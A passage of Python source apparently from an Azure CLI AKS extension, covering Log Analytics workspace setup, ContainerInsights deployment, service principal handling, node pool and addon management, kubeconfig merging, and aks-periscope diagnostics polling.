"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
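# _ensure_container_insights_for_monitoring deploys the ContainerInsights solution to the
# Log Analytics workspace referenced by the omsagent addon, using an inline ARM template
# scoped to the workspace's subscription and resource group.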
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
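# _ensure_aks_service_principal loads a cached service principal from
# aksServicePrincipal.json when --service-principal is not given, creating a new one
# (with a generated client secret) if nothing is cached, and persists the result so
# later runs can reuse it.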
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler')
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
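# _ensure_aks_acr resolves the ACR either by resource ID or by name across resource
# groups, and then grants (or, with detach=True, revokes) the 'acrpull' role for the
# cluster's identity on that registry.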
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
public_ip_per_vm=False,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expected a value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
enable_node_public_ip=public_ip_per_vm,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
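# aks_agentpool_scale sets an explicit node count on an existing node pool; scaling to 0
# or to the current count is rejected.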
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_shared=appgw_shared, appgw_watch_namespace=appgw_watch_namespace, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=appgw_id_dict["subscription"], resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
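# _update_addons enables or disables the addons listed in the comma-separated `addons`
# argument on an existing cluster, applying addon-specific configuration (monitoring
# workspace, virtual-node subnet, ingress-appgw settings) when enabling and clearing the
# config when disabling.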
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=False,
appgw_watch_namespace=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
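# _handle_merge merges one kubeconfig section (clusters/users/contexts) from `addition`
# into `existing`. Entries with the same name are replaced when `replace` is set or the
# entries are identical; otherwise the user is prompted, and a CLIError is raised if the
# conflicting entry is not overwritten.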
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
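# display_diagnostics_report polls the aks-periscope custom resources ("apd") until a
# diagnostic result exists for every Ready node, then prints the collected network
# configuration and network connectivity tables for each node.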
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Cannot find the kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
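# Poll up to max_retry times: first wait until aks-periscope has produced one
# diagnostic result (apd) per ready node, then read each node's network
# configuration and outbound connectivity status once they are populated.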
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
